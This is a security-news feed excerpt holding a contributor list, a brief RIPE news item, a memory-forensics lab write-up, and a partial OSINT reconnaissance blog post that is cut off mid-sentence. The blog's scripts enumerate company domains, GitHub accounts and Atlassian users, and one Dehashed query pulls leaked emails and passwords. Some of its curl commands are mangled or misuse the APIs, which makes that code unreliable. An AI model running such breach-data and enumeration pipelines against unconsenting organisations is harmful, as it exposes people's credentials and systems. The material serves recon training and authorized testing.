<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/oxngon/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/oxngon">@oxngon</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/OYLFLMH/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/OYLFLMH">@OYLFLMH</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paperclip/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paperclip">@paperclip</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/paulb26/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/paulb26">@paulb26</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pengyuyanITYU/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pengyuyanITYU">@pengyuyanITYU</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/PhilipAD/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/PhilipAD">@PhilipAD</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/pinguarmy/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/pinguarmy">@pinguarmy</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/plcunha/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/plcunha">@plcunha</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ProgramCaiCai/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ProgramCaiCai">@ProgramCaiCai</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/psionic73/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/psionic73">@psionic73</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qin-ctx/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qin-ctx">@qin-ctx</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qingshan89/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qingshan89">@qingshan89</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Que0x/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Que0x">@Que0x</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/qWaitCrypto/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/qWaitCrypto">@qWaitCrypto</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/r266-tech/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/r266-tech">@r266-tech</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/randomsnowflake/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/randomsnowflake">@randomsnowflake</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rbrtbn/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rbrtbn">@rbrtbn</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rewbs/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rewbs">@rewbs</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rio-jeong/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rio-jeong">@rio-jeong</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Rivuza/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Rivuza">@Rivuza</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rob-maron/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rob-maron">@rob-maron</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/rodboev/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/rodboev">@rodboev</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/ruangraung/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/ruangraung">@ruangraung</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/RyTsYdUp/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/RyTsYdUp">@RyTsYdUp</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/Sahil-SS9/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/Sahil-SS9">@Sahil-SS9</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/salesondemandio/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/salesondemandio">@salesondemandio</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sanidhyasin/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sanidhyasin">@sanidhyasin</a>,<br>
<a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sarvesh1327/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sarvesh1327">@sarvesh1327</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/sdyckjq-lab/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/sdyckjq-lab">@sdyckjq-lab</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/shannonsands/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/shannonsands">@shannonsands</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/SHL0MS/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/SHL0MS">@SHL0MS</a>, @simpolism, @sitkarev, @skyc1e, @skylarbpayne, @SNooZyy2,<br>
@Spaceman-Spiffy, @srojk34, @sweetcornna, @synapsesx, @Tamaz-sujashvili, @tangtaizong666, @temalo, @tfournet,<br>
@thedavidweng, @TheGardenGallery, @tim404x, @tomekpanek, @Tranquil-Flow, @tt-a1i, @tuancookiez-hub,<br>
@underthestars-zhy, @Veritas-7, @victor-kyriazakos, @wesleysimplicio, @WolframRavenwolf, @WompaJango, @x1erra,<br>
@xiaoxinova, @xtymac, @xushibo, @XVVH, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxchan/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxchan">@xxchan</a>, <a class="user-mention notranslate" data-hovercard-type="user" data-hovercard-url="/users/xxxigm/hovercard" data-octo-click="hovercard-link-click" data-octo-dimensions="link_type:self" href="https://github.com/xxxigm">@xxxigm</a>, @xy200303, @y0shua1ee, @yanxue06, @yatesjalex,<br>
@YLChen-007, @yoniebans, @youjunxiaji, @yubingz, @zakame, @zapabob, @zccyman, @zimigit2020, @ziwon, @zwcf5200,<br>
@zxcasongs.</p>
<hr>
<p><strong>Full Changelog</strong>: <a href="https://github.com/NousResearch/hermes-agent/compare/v2026.6.5...v2026.6.19">v2026.6.5...v2026.6.19</a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Geopolitical jitters push Europe's internet registry away from cloud-first strategy]]></title>
<description><![CDATA[Members aren't RIPE for a new charging scheme, though]]></description>
<link>https://tsecurity.de/de/3610197/it-nachrichten/geopolitical-jitters-push-europes-internet-registry-away-from-cloud-first-strategy/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610197/it-nachrichten/geopolitical-jitters-push-europes-internet-registry-away-from-cloud-first-strategy/</guid>
<pubDate>Fri, 19 Jun 2026 13:17:58 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Members aren't RIPE for a new charging scheme, though]]></content:encoded>
</item>
<item>
<title><![CDATA[Brave Blue Team Lab (CyberDefenders)]]></title>
<description><![CDATA[Brave | Blue team challenge.You can read this writeup on my GitBook account LinkScenario:A memory image was acquired from a suspected compromised Windows workstation. The system belonged to a user flagged for potentially malicious activities, including unauthorized access attempts and unusual bro...]]></description>
<link>https://tsecurity.de/de/3610155/hacking/brave-blue-team-lab-cyberdefenders/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610155/hacking/brave-blue-team-lab-cyberdefenders/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:25 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<figure><img alt="" src="https://cdn-images-1.medium.com/max/404/1*Huf5mW2dP2M18M3h_yJ2tg.png"></figure><p><a href="https://cyberdefenders.org/blueteam-ctf-challenges/brave/">Brave | Blue team challenge.</a></p><blockquote>You can read this writeup on my GitBook account <a href="https://prankster.gitbook.io/prankster/cyberdefenders/cyberdefenders_writeups/brave">Link</a></blockquote><h4>Scenario:</h4><p>A memory image was acquired from a suspected compromised Windows workstation. The system belonged to a user flagged for potentially malicious activities, including unauthorized access attempts and unusual browsing patterns. The security team observed network activity to external IPs associated with encrypted communication services.</p><p>Your task is to analyze the provided memory dump to uncover details about the processes involved, identify active connections at the time of the compromise, and trace the usage patterns of specific applications.</p><p><strong>Tools:</strong></p><p><a href="https://www.osforensics.com/tools/volatility-workbench.html">Volatility Workbench </a>, <a href="https://cyberdefenders.org/blueteam-ctf-challenges/?tools=hxd">HxD</a>, <a href="https://www.osforensics.com/tools/volatility-workbench.html">WhoIs</a> , <a href="https://www.python.org/downloads/">Python3 </a>, <a href="https://letsdefend.io/blog/how-to-install-volatility-2-and-volatility-3-on-windows">Volatility 3</a>, <a href="https://learn.microsoft.com/en-us/powershell/module/microsoft.powershell.utility/get-filehash?view=powershell-7.5">Get-FileHash</a>, <a href="https://notepad-plus-plus.org/downloads/">Notepad++</a></p><p>First i am using Volatility Workbench as my volatility3 GUI version instead of the command line version to work easily on windows, Link <a href="https://www.osforensics.com/tools/volatility-workbench.html">HERE</a></p><p><strong><em>Q1: What time was the RAM image acquired according to the suspect system?</em></strong></p><p>Using <strong>Windows.info.Info</strong> command we can see the answer is under systemTime section</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/748/1*emIoz6OgzUo6PrdqPsKHbA.png"></figure><p><strong><em>Q2: What is the SHA256 hash value of the RAM image?</em></strong></p><p>Using the basic command to get the SHA256 hash value of the RAM image</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*8QJ9s959kQSuPGKQm7MPpw.png"></figure><p><strong><em>Q3: What is the process ID of brave.exe?</em></strong></p><p>Using <strong>Windows.pslist.PsList</strong> command to get the pid of brave.exe</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/471/1*76vXAYRaaJpxHIrP0OmY7Q.png"></figure><p><strong><em>Q4: How many established network connections were there at the time of acquisition?</em></strong></p><p>As i’m on windows and i’m using volatility workbench, so i don’t have the option to grep the answer as we can do on linux, but i got the alternative :)</p><p>Using <strong>Windows.netscan.NetScan </strong>command to scan for network objects present in this windows memory image</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Iehk32tQX4ergPVoYKROuA.png"></figure><p>And then we can take the whole output copy and paste it into <strong>notepad++ </strong>to see how many established network connections using <strong>ctrl+f to </strong>to find how many the word <strong>ESTABLISHED </strong>has been repeated in the whole output,</p><p>we can see the count matches here in the following image :)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/581/1*lZR8bwvA4PZJFkTpPwFQTw.png"></figure><p><strong>Q5: Which domain name does Chrome have an established network connection with?</strong></p><p>Using <strong>Windows.netscan.NetScan </strong>command to scan for network objects present in this windows memory image</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/536/1*B3JrR97UFLvXxnCYHyEY5w.png"></figure><p>We will scroll down until we see this line, chrome.exe process established a connection with this ip address, so we can hop on <a href="https://whois.domaintools.com/"><strong>WhoIs</strong></a> to see which domain this ip address belongs to</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/761/1*JTd8IngzWuD4aJqSAHQoYQ.png"></figure><p><strong><em>Q6: What is the MD5 hash value of the process executable for PID 6988?</em></strong></p><p>Unfortunately this question i couldn't solve it using the volatility workbench, so i used the volatility 3 on windows to dump the file correctly and get the MD5 hash value of pid 6988 (OneDrive.exe)</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*AXu_z_kX98j1uXoe3imtMQ.png"></figure><p><strong><em>Q7: Can you identify the word that begins at offset 0x45BE876 and is 6 bytes long?</em></strong></p><p>we cn use <a href="https://mh-nexus.de/en/hxd/">HxD</a> Editor, open the memory image file using HxD, ann then click <strong>ctrl+g </strong>to go to a specific offset</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/230/1*ow4HL8TgxSSwsCJ58NeA0A.png"></figure><p>the offset will begin from what we typed, so we have to count the next 6 bytes to get the desired word</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/615/1*LGzOBX4rmudDg3QYDWxAmg.png"><figcaption><strong>6 bytes to 6 leters word</strong></figcaption></figure><p><strong><em>Q8: What is the creation date and time of the parent process of powershell.exe?</em></strong></p><p>Using windows.pstree to get the tree hierarchy of the processes</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/311/1*tcdwXgc8KgLhnt3v4WDP6A.png"></figure><p>so we need to get the creation date and time for explorer.exe process with pid 4352</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/948/1*e50L40W6u3tqwq6EdFK8KQ.png"></figure><p><strong><em>Q9: What is the full path and name of the last file opened in notepad?</em></strong></p><p>We can use this setting to get the appropriate outcome</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/497/1*rVFxCjPDf0slJWLtBkgUyA.png"></figure><figure><img alt="" src="https://cdn-images-1.medium.com/max/939/1*fmeWCmBN6mxP5I9KP9iFiA.png"></figure><p><strong><em>Q10: How long did the suspect use Brave browser? (In Hours)</em></strong></p><p>Using windows.registry.userassist to print userassist registry keys and information about each process</p><p>Because the output is very long, we need to search in it, so put the output inside a text file, then search for brave inside it</p><p>Be aware that we are looking for Brave, not Updater, not a link file, Just the real Brave process that we are looking for</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*Jei8-DYrkw5v-zIyxWtA4g.png"></figure><h3>Thanks For Reading</h3><img src="https://medium.com/_/stat?event=post.clientViewed&amp;referrerSource=full_rss&amp;postId=2d4b8726669c" width="1" height="1" alt=""><hr><p><a href="https://infosecwriteups.com/brave-blue-team-lab-cyberdefenders-2d4b8726669c">Brave Blue Team Lab (CyberDefenders)</a> was originally published in <a href="https://infosecwriteups.com/">InfoSec Write-ups</a> on Medium, where people are continuing the conversation by highlighting and responding to this story.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a…]]></title>
<description><![CDATA[Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a Critical BugA deep technical blog on using phone numbers and email addresses to discover hidden domains, subdomains, and attack surface — with real-world techniques you can use today.Phone Numbers and E...]]></description>
<link>https://tsecurity.de/de/3610154/hacking/phone-numbers-and-emails-to-hidden-subdomains-the-osint-acquisition-pipeline-that-uncovered-a/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3610154/hacking/phone-numbers-and-emails-to-hidden-subdomains-the-osint-acquisition-pipeline-that-uncovered-a/</guid>
<pubDate>Fri, 19 Jun 2026 13:09:24 +0200</pubDate>
<category>🕵️ Hacking</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Phone Numbers and Emails to Hidden Subdomains: The OSINT Acquisition Pipeline That Uncovered a Critical Bug</h3><p><em>A deep technical blog on using phone numbers and email addresses to discover hidden domains, subdomains, and attack surface — with real-world techniques you can use today.</em></p><figure><img alt="" src="https://cdn-images-1.medium.com/max/1024/1*szLFGSpzqAnso14K4v5vnA.png"><figcaption>Phone Numbers and Emails to Hidden Subdomains</figcaption></figure><h3>Foreword: Why I Wrote This</h3><p>In bug bounty and security research, one of the biggest challenges is not finding vulnerabilities — it’s finding the right attack surface.</p><p>Many researchers start with traditional reconnaissance: collecting subdomains, checking DNS records, and running automated tools. While these methods are valuable, they often miss assets that are not directly connected to the primary domain.</p><p>This is where OSINT becomes powerful.</p><p>A simple phone number or email address can become a starting point for discovering hidden digital assets:</p><ul><li>A company email can reveal related domains and third-party services</li><li>Public profiles can expose forgotten infrastructure</li><li>Developer footprints can reveal technology stacks and assets</li><li>Business records can connect organizations to previously unknown domains</li></ul><p>The idea behind this research is simple:</p><p><strong>Public information creates relationships, and relationships create attack surface.</strong></p><p>This blog explores an OSINT-driven acquisition workflow for connecting phone numbers and email addresses with domains, subdomains, and external assets. These techniques are useful for authorized security testing, bug bounty research, and improving reconnaissance skills.</p><p>The goal is not just to collect more assets — it is to understand how different pieces of public information connect together to reveal a larger security picture.</p><h3>Part I: The Conceptual Framework — Why This Works</h3><h3>The Problem with Traditional Subdomain Discovery</h3><p>Traditional subdomain discovery relies on one thing: the DNS namespace is enumerable. You either brute-force it (guess names) or query passive sources (CT logs, passive DNS).</p><p>Both approaches share a fundamental limitation: they only find subdomains that are publicly resolvable or historically logged.</p><p>Here’s what they miss:</p><ul><li>Private/internal domains (e.g., internal.company.com that only resolves on the corporate VPN)</li><li>Pre-production domains that were registered but never deployed to DNS</li><li>Acquired company domains that aren’t linked from the parent</li><li>Domains used for third-party services (e.g., company.slack.com, company.atlassian.net)</li><li>Personal domains used by employees for work purposes</li></ul><h3>The Email-to-Domain Bridge</h3><p>Every email address user@domain.com tells you:</p><ol><li>The domain exists (obvious, but foundational)</li><li>The domain is actively used (someone sent mail from it)</li><li>The domain has a user (potential credential, potential account)</li><li>The domain is connected to services (GitHub, Slack, Jira, AWS, etc.)</li></ol><p>When you collect thousands of email addresses associated with a company, and you extract every domain from those emails, you build a corporate domain graph that DNS brute-force can never replicate.</p><h3>The Phone-to-Domain Bridge</h3><p>Every phone number +1 (415) 555-0199 tells you:</p><ol><li>The company exists at a physical location (office, data center)</li><li>The company uses a specific VOIP provider (Twilio, RingCentral, Vonage)</li><li>The company has registered infrastructure (WHOIS records, business registries)</li><li>The company has extensions (which map to departments, which map to services)</li></ol><p>When you collect phone numbers and reverse-search them, you find domains that were registered with those same phone numbers — often from before the company had a proper security team.</p><h3>Part II: Phone Number → Domain Discovery</h3><p>Phone numbers are a persistent identifier. Companies change domains more often than they change phone numbers. A domain registered in 2005 with a phone number is still associated with that company today — even if the domain is forgotten.</p><h3>Technique 1: WHOIS Phone Number Search</h3><p>Every domain registration includes a phone number. SecurityTrails, WhoisXMLAPI, and DomainTools allow you to search by phone number to find all domains registered with it.</p><pre>#!/bin/bash<br># phone-to-domain.sh - Find domains registered with a specific phone number<br>PHONE="$1"<br><br># Using WhoisXMLAPI (paid, but worth it)<br>curl -s "https://www.whoisxmlapi.com/whoisserver/WhoisService?apiKey=$API_KEY&amp;domainName=$PHONE&amp;outputFormat=JSON" | \<br>    jq -r '.WhoisRecord.registryData.registrarName // empty'<br><br># Using DomainTools (requires API key)<br>curl -s "https://api.domaintools.com/v1/$PHONE/domains/" \<br>    -u "$DOMAINTOOLS_USER:$DOMAINTOOLS_KEY" | \<br>    jq -r '.response.domains[]'<br><br># Manual: Reverse WHOIS lookup on SecurityTrails<br># https://securitytrails.com/list/phone/$PHONE</pre><p>What this finds: Every domain that was ever registered with that phone number — including domains for subsidiaries, defunct products, and personal projects.</p><h3>Technique 2: Business Registry Phone Search</h3><p>Every corporation in the US registers with a state business registry. These registries include phone numbers. You can search by phone number to find all corporations registered under that number.</p><pre># OpenCorporates API<br>curl -s "https://api.opencorporates.com/v0.4/companies/search?q=$PHONE&amp;api_token=$TOKEN" | \<br>    jq -r '.results[].company.name'<br><br># State-specific registries (examples)<br># California: https://businesssearch.sos.ca.gov/<br># Delaware: https://icis.corp.delaware.gov/<br># Texas: https://mycpa.cpa.state.tx.us/coa/</pre><p>What this finds: Legal entities, DBAs, and subsidiaries that aren’t publicly linked to the parent company.</p><h3>Technique 3: Phone Number Reverse Lookup Services</h3><pre># Twilio Lookup API<br>curl -s "https://lookups.twilio.com/v1/PhoneNumbers/$PHONE?Type=carrier&amp;Type=caller-name" \<br>    -u "$TWILIO_SID:$TWILIO_TOKEN" | \<br>    jq '.carrier.name, .caller_name.caller_name'<br><br># Numverify<br>curl -s "https://apilayer.net/api/validate?access_key=$KEY&amp;number=$PHONE" | \<br>    jq '.carrier, .location, .line_type'<br><br># Manual: Whitepages reverse lookup</pre><p>What this finds: The carrier name (VOIP provider), which tells you what infrastructure to attack, and sometimes the registered business name.</p><h3>Technique 4: Breach Data Phone Search (Authorized Only)</h3><p>If you have authorized access to breach databases:</p><pre># Dehashed search by phone<br>curl -s "https://api.dehashed.com/v1/search?query=phone:$PHONE&amp;size=1000" \<br>    -u "$EMAIL:$API_KEY" | \<br>    jq -r '.entries[].domain' | sort -u</pre><p>What this finds: Every domain where an account was registered with that phone number — including internal systems, VPN portals, and employee benefits portals.</p><h3>Real-World Example: Phone-to-Domain Discovery</h3><p>Target: Large healthcare tech company. Scope: *.healthtech.com.</p><p>I found the company’s main phone number from their contact page: +1 (617) 555-0100.</p><p>I ran a WHOIS phone number search:</p><pre># SecurityTrails reverse WHOIS by phone<br># Result: 47 domains registered with +1.617.555.0100</pre><p>Among those 47 domains:</p><figure><img alt="" src="https://cdn-images-1.medium.com/max/734/1*9rVIeYeZHnAqzlW8RoepFg.png"><figcaption>47 domains</figcaption></figure><p>Critical find: internal-healthtech.com was registered with the same phone number but was not on any subdomain list. It resolved to a private IP range (10.x.x.x) from the outside, but it hosted an internal tool portal accessible via VPN. The VPN wasn't in scope either — until I found it through the phone number.</p><h3>Part III: Email Address → Domain Discovery</h3><p>Every email address user@domain.com is a direct pointer to a domain. When you collect thousands of emails associated with a target company, you build a comprehensive domain inventory.</p><h3>Technique 1: Cross-Company Email Analysis</h3><p>When employees from Company A and Company B communicate, email headers reveal both domains. If you find john@company-a.com and jane@company-b.com in the same email chain, they're connected.</p><pre># From breach data (authorized): find which domains appear alongside the target domain<br># From leaked email threads: extract all sender/receiver domains<br># From public mailing lists: find cross-company email patterns</pre><p>What this finds: Business relationships — partners, vendors, clients, and acquired companies.</p><h3>Technique 2: The Hunter.io API Multi-Domain Search</h3><p>Hunter.io allows you to search by domain AND by company name. The company name search returns emails from multiple domains:</p><pre># Search by company name<br>curl -s "https://api.hunter.io/v2/company/domain?company=healthtech&amp;api_key=$KEY" | \<br>    jq -r '.data.domains[]'<br><br># Result:<br># healthtech.com<br># healthtech.io<br># healthtech.dev<br># healthtech-careers.com<br># healthtech-benefits.com</pre><p>What this finds: All domains associated with a company name, including HR, benefits, and internal tool domains.</p><h3>Technique 3: Email-to-GitHub-to-Domain Chain</h3><p>This is one of the most powerful discovery chains in bug hunting:</p><ol><li>Collect employee email: alice@healthtech.com</li><li>Search GitHub for that email: finds Alice’s GitHub account</li><li>Look at Alice’s GitHub repos, commits, and organizations</li><li>Find references to other domains in code, configs, and commit messages</li></ol><pre>#!/bin/bash<br># email-to-github-to-domains.sh<br>EMAIL="$1"<br><br># Step 1: Find GitHub account<br>echo "[*] Searching GitHub for $EMAIL..."<br>curl -s "https://api.github.com/search/users?q=$EMAIL+in:email" | \<br>    jq -r '.items[].login' &gt; github_users.txt<br><br># Step 2: For each GitHub user, find their repos and orgs<br>while read USER; do<br>    echo "[*] Checking user: $USER"<br>    <br>    # Get user's repos<br>    curl -s "https://api.github.com/users/$USER/repos?per_page=100" | \<br>        jq -r '.[].full_name' &gt;&gt; repos.txt<br>    <br>    # Get organizations<br>    curl -s "https://api.github.com/users/$USER/orgs" | \<br>        jq -r '.[].login' &gt;&gt; orgs.txt<br>    <br>    sleep 2  # Rate limiting<br>done &lt; github_users.txt<br><br># Step 3: Search repo contents for domain references<br>while read REPO; do<br>    echo "[*] Searching repo: $REPO"<br>    <br>    # Search code for domain patterns<br>    curl -s "https://api.github.com/search/code?q=repo:$REPO+healthtech" | \<br>        jq -r '.items[].html_url' &gt;&gt; code_refs.txt<br>    <br>    # Search commit messages for domain references<br>    curl -s "https://api.github.com/search/commits?q=repo:$REPO+healthtech" | \<br>        jq -r '.items[].html_url' &gt;&gt; commit_refs.txt<br>    <br>    sleep 2<br>done &lt; repos.txt</pre><p>What this finds: Internal domains referenced in code comments, config files, READMEs, and commit messages.</p><h3>Technique 4: Email-to-Breach-to-Domain Correlation</h3><p>When an employee’s email appears in a breach, you can see what service they were using and what domain was involved:</p><pre># Dehashed query (authorized)<br>curl -s "@healthtech.com&amp;size=10000"&gt;https://api.dehashed.com/v1/search?query=email:@healthtech.com&amp;size=10000" \<br>    -u "$EMAIL:$API_KEY" | \<br>    jq -r '.entries[] | "\(.domain) \(.email) \(.password)"' | sort -u<br><br># Extract unique domains<br>curl -s "@healthtech.com&amp;size=10000"&gt;https://api.dehashed.com/v1/search?query=email:@healthtech.com&amp;size=10000" \<br>    -u "$EMAIL:$API_KEY" | \<br>    jq -r '.entries[].domain' | sort -u &gt; breached-domains.txt</pre><p>What this finds: Domains where employees had accounts — including personal projects, side businesses, and services they used for work purposes (sometimes on unmanaged infrastructure).</p><h3>Technique 5: Email-Specific Subdomain Discovery</h3><p>Services like Have I Been Pwned, Firefox Monitor, and custom tools can tell you which subdomains of a company have accounts registered:</p><pre># Check if a subdomain has active accounts<br># For Office 365: login.microsoftonline.com will reveal tenant info<br># For Atlassian: company-name.atlassian.net<br># For Slack: company-name.slack.com<br># For GitHub: github.com/orgs/CompanyName<br><br># Using emails to discover the company's Atlassian instance:<br>for email in $(cat emails.txt); do<br>    # Check for Atlassian account<br>    response=$(curl -s -o /dev/null -w "%{http_code}" \<br>        "https://healthtech.atlassian.net/rest/analytics/1.0/user/is-licensed?username=$email")<br>    <br>    if [ "$response" == "200" ] || [ "$response" == "401" ]; then<br>        echo "Atlassian domain found: healthtech.atlassian.net"<br>        break<br>    fi<br>done</pre><h3>Real-World Example: Email-to-Domain Discovery Chain</h3><p>Target: Financial services company finsecure.com.</p><p>I collected 2,400 emails using Hunter.io, theHarvester, and LinkedIn scraping. Among them was devops@finsecure.com.</p><p>GitHub search on <a href="mailto:devops@finsecure.com">devops@finsecure.com</a>: Found a GitHub account finsecure-devops with a private repo (misconfigured visibility).</p><p>Repo contents revealed:</p><ul><li>deploy.config with DB_HOST=mariadb.internal.finsecure.com</li><li>terraform.tf with bucket = "finsecure-terraform-state"</li><li>README.md with See internal docs at docs.internal.finsecure.com</li></ul><p>New domains discovered:</p><ul><li>internal.finsecure.com — Not in any CT log or DNS record</li><li>docs.internal.finsecure.com — Subdomain of the above</li><li>mariadb.internal.finsecure.com — Internal database hostname</li><li>finsecure-terraform-state.s3.amazonaws.com — S3 bucket with terraform state</li></ul><p>The S3 bucket was publicly listable. It contained AWS access keys. The AWS keys gave access to the production environment.</p><p>Chain: 1 email → 1 GitHub account → 1 repo → 4 new domains → 1 S3 bucket → AWS root access.</p><h3>Part IV: Phone Number + Email → Subdomain Discovery (The Real Gold)</h3><p>When you combine phone numbers and emails, you unlock subdomain discovery that no DNS tool can match.</p><h3>Technique 1: WHOIS Contact Cross-Reference</h3><p>Company domains are often registered by the same person. If you find the registrant’s name and email from one domain, you can find all other domains they’ve registered:</p><pre># Step 1: Get WHOIS info for the main domain<br>whois healthtech.com | grep -E "Registrant|Admin|Tech|Email" &gt; whois-info.txt<br><br># Step 2: Extract registrant name and email<br>NAME=$(grep "Registrant Name" whois-info.txt | awk -F: '{print $2}' | xargs)<br>EMAIL=$(grep "Registrant Email" whois-info.txt | awk -F: '{print $2}' | xargs)<br><br># Step 3: Search for other domains with same registrant<br># Using WhoisXMLAPI<br>curl -s "https://www.whoisxmlapi.com/whoisserver/WhoisService?apiKey=$API_KEY&amp;domainName=$NAME&amp;outputFormat=JSON" | \<br>    jq -r '.WhoisRecord.registryData.registrantDomains[]'<br><br># Using DomainTools Reverse WHOIS<br>curl -s "https://api.domaintools.com/v1/$NAME/domains/" \<br>    -u "$DOMAINTOOLS_USER:$DOMAINTOOLS_KEY" | \<br>    jq -r '.response.domains[]'</pre><h3>Technique 2: Social Media Profile Mining</h3><p>Employee LinkedIn profiles often list multiple domains:</p><pre>Current: Senior Engineer at HealthTech (healthtech.com)<br>Past: Lead Developer at MedData (meddata.io)<br>Education: MIT (mit.edu)</pre><p>Each of these is a domain that may or may not be in scope. If meddata.io was acquired by healthtech.com, then meddata.io infrastructure is likely part of the target's attack surface.</p><pre># LinkedIn scraper (requires authentication)<br># Extract: current company, past companies, education<br># Cross-reference with known acquisitions<br><br># For each past company found on LinkedIn profiles:<br># Check if it was acquired by the target<br># If yes: run full acquisition pipeline on that domain</pre><h3>Technique 3: Support Portal and Help Desk Domains</h3><p>Phone numbers often lead to support portals, which lead to subdomains:</p><pre># Call the company's support number<br># Listen for automated messages:<br># "Press 1 for billing" → billing.helpdesk.com<br># "Press 2 for technical support" → support.helpdesk.com<br># "Press 3 for sales" → 